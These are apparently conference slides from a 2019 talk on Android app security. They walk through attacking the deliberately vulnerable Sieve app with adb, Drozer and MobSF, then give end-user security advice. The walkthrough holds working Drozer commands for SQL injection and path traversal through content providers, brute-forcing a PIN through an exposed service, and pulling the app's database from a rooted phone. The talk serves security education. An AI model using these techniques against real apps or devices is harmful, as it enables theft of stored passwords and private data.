Android Apps

How easy is it to tear them apart and steal your data?

Offensive Security Conference #OFFSECBLR2019

Riddhi Shree

  • Security Analyst @appseccouk
  • Chapter Leader @nullblr
  • A Toastmaster @Toastmasters

Objective of this Talk

  • To create awareness about Android app security by showing you ways data could be stolen from an installed app.

Your Takeaways

  • See Android app hacking in action!
  • Become familiar with some Android app vulnerabilities
  • Why Android app security matters?
  • What makes an Android app vulnerable?
  • How to secure yourself as an Android app user?

Let's hack an Android app!

Hardware Ingredients

  1. A rooted Android phone
  2. USB cable
  3. WiFi setup

Software Ingredients

  1. Android Debug Bridge (adb)
  2. MobSF
  3. Drozer
  4. SQLite Browser

Target App

It's deliberately vulnerable

Hacking in 7 Steps

  1. Identify Architecture of APK
  2. Identify IP Address of Android Phone
  3. Connect to Android Phone
  4. Install APK
  5. Static Analysis
  6. Dynamic Analysis
  7. Storage Analysis

A Few Vulnerabilities

  1. Hardcoded sensitive data
  2. Launching an unprotected activity
  3. SQL-Injection via content provider
  4. Path-traversal via content provider
  5. Invoking an unprotected service
  6. Reading unencrypted data from SQLite database

#1. Identify Architecture of APK

$ unzip sieve.apk -d sieve_binary

#2. Identify IP Address of Android Phone

  1. Go to Settings > Connections > Wifi
  2. Long press on desired network connection
  3. Select "Manage Network Settings"
  4. Select "Show advanced options"
  5. Scroll down to view the IP address of Android phone

#3. Connect to Android phone

  1. Connect Android phone to laptop via USB cable 
  2. Identify the IP address of target Android phone
  3. Run following commands:
  4. Unplug the USB cable
$ adb tcpip 5555
$ adb connect 192.X.Y.Z:5555
$ adb devices
$ adb shell
zerolte:/ $ whoami
shell
zerolte:/ $ su
zerolte:/ # whoami
root

#4. Install APK

$ adb install sieve.apk

#5. Static Analysis

Start MobSF

$ sudo docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

Check 'Android Permissions'

Check 'Manifest Analysis'

Hardcoded Internal IP and port in 'SettingsActivity.java'

#6. Dynamic Analysis

Install Drozer Agent in Android

$ adb install drozer-agent-2.3.4.apk

Turn on 'Embedded Server'

Connect to Drozer Agent using Drozer Console

$ adb forward tcp:31415 tcp:31415
$ drozer console connect

What is an Activity?

  1. Start adb logcat
  2. Launch Sieve app
  3. Login activity shows up
  4. Enter valid Password / PIN
  5. PWList activity shows up
  6. You can see "Your Passwords"
$ adb logcat | grep com.mwr.example.sieve

Identify Vulnerable Activities

dz> run app.activity.info -a com.mwr.example.sieve

Launch a Vulnerable Activity 

dz> run app.activity.info -a com.mwr.example.sieve
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

Identify Vulnerable Content Providers

dz> run app.provider.info -a com.mwr.example.sieve

What is a Content Provider?

https://gerardnico.com/_media/android/content_provider.png

Obtain a List of Accessible Content URIs

run scanner.provider.finduris -a com.mwr.example.sieve

content://content_authority/table_name

SQL-Injection Attack via Content Provider

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'" 
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

Path Traversal via Content Provider

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
$ adb shell
zerolte:/ $ su
zerolte:/ # cd /sdcard/Android/data/com.mwr.example.sieve/files
zerolte:/sdcard/Android/data/com.mwr.example.sieve/files # ls
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/sdcard/Android/data/com.mwr.example.sieve/files/"Backup (2019-07-03 11-41-44.124).xml"

Identify Vulnerable Services

dz> run app.service.info -a com.mwr.example.sieve

Let's Analyze 'AuthService.java'

What does 'getKey()' return?

It returns the Master Password!

Brute Force PIN & Retrieve Master Password

dz> run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 1 --extra string com.mwr.example.sieve.PIN <ENTER_PIN_CODE> --bundle-as-obj

#7. Storage Analysis

How to Pull Files from Rooted Phone? 

Welcome "adb-root"!

https://github.com/Jakeler/adb-root

Pull a Database File

$ python3 adb-root.py pull -v /data/data/com.mwr.example.sieve/databases/database.db db1.db

Open the Database File in SQLiteBrowser

$ sqlitebrowser

Compromised Sieve App!

Why Android App Security Matters? 

According to Statistic

http://gs.statcounter.com/os-market-share/mobile/worldwide

NEWS

What Makes an Android App Vulnerable?

Two Main Reasons

  • Non-conformance with security best practices
  • Lack of security awareness in users

As a Result ...

#1. Users Using Vulnerable App

#2. Falling Prey To Malware

An Adversary Can

  1. Gain physical access to a stolen device
  2. Access your device remotely via a malware

What Next??!

Things could go                 here

  1. Hard Coded Passwords & Keys

  2. Sensitive Data in Local Storage

  3. Insecure interaction with the Android OS

  4. Data sent over HTTP to API endpoints
  5. Broken Authentication and Authorization

As a User, You Should ...

Be Aware of Where You Install Your App From!

1. Google Play

ALWAYS USE THIS.

  • Use official app store
  • Anything else is 3rd-party store

2. Avoid 3rd-Party App Stores

NEVER!!!

3. Check App Permissions

Ask Why?

4. Install System Updates

Be Informed! Be Safe!

Twitter: @_riddhishree

Email: mirage@null.co.in

Further Reading

  1. https://null-android-pentesting.netlify.com/
  2. https://github.com/mwrlabs/drozer
  3. ftp://ftp.wayne.edu/ldp/en/Linux-Android-HOWTO/Linux-Android-HOWTO-single.htmlQ
  4. https://blog.ja-ke.tech/2018/09/20/adb-root.html
  5. https://github.com/Jakeler/adb-root
  6. https://github.com/as0ler/Android-Examples/blob/master/sieve.apk
  7. https://securingtomorrow.mcafee.com/business/patching-android-binary/

References-1

  1. http://blog.startwithwhy.com/.a/6a00d834525fff69e201bb08887fa8970d-pi
  2. http://fixfirmwares.com/sm-g925i-cf-auto-root-s6
  3. http://gs.statcounter.com/os-market-share/mobile/worldwide
  4. https://2.bp.blogspot.com/-SyYsE6lCBK4/WpbnmkKnvjI/AAAAAAAAFG4/iALBir1-WU0NzVTf-83eo3MB0kvaHZliQCLcBGAs/s1600/ad_logo_twitter_card.png
  5. https://appbrain-app-market.en.uptodown.com/android
  6. https://f-droid.org/en/
  7. https://forum.xda-developers.com/android/apps-games/app-selinux-switch-t3656502
  8. https://forum.xda-developers.com/showthread.php?p=75587044#post75587044
  9. https://forum.xda-developers.com/showthread.php?t=1687590
  10. https://forum.xda-developers.com/showthread.php?t=1687590&page=27
  11. https://fscl01.fonpit.de/userfiles/6727621/image/2nd_YEAR/Random/Play_store_ANDROIDPIT.jpg
  12. https://futurestud.io/tutorials/how-to-debug-your-android-app-over-wifi-without-root
  13. https://mashable.com/article/apps-malware-google-play-store-breach/

References-2

  1. https://securityaffairs.co/wordpress/80057/hacking/es-file-explorer-flaws.html
  2. https://stackoverflow.com/questions/25271878/android-adbd-cannot-run-as-root-in-production-builds/28070414
  3. https://threatpost.com/microsoft-outlook-android-xss/145924/
  4. https://www.androidpolice.com/wp-content/uploads/2018/08/mobile-gaming-samsung.png
  5. https://www.cisomag.com/critical-vulnerability-in-outlook-for-android-affects-more-than-100-million-users/
  6. https://www.cisomag.com/instagram-data-breach-49-million-users-sensitive-data-exposed-online/
  7. https://www.digit.in/news/internet/popular-android-apps-are-sharing-sensitive-data-with-facebook-report-45563.html
  8. https://www.google.co.in/url?sa=i&source=images&cd=&ved=2ahUKEwiLqta01pjjAhVaf30KHUPjDvoQjRx6BAgBEAU&url=https%3A%2F%2Fwww.notebookcheck.net%2FOver-700-000-rogue-apps-removed-from-Google-Play-Store-in-2017.280554.0.html&psig=AOvVaw120qqqU9wIkF1h16yAtHFs&ust=1562240719967516
  9. https://www.thenational.ae/business/technology/whatsapp-voice-calls-used-to-inject-israeli-spyware-ft-reports-1.861156

References-3

  1. https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/
  2. https://www.xda-developers.com/run-adbd-in-root-mode-with-adbd-insecure/
  3. https://www.zdnet.com/article/android-malware-steals-money-from-paypal-accounts-while-users-watch-helpless/
  4. https://zdnet3.cbsistatic.com/hub/i/r/2018/12/11/7339c2a1-3116-4f7b-a9cc-12127fffdce9/thumbnail/770x578/5442beca9e6190562fb773e9ec8758f6/android-paypal-steal.jpg
  5. https://cdn0.iconfinder.com/data/icons/customer-service-and-feedback-part-2/64/Q_A-session-512.png

Troubleshooting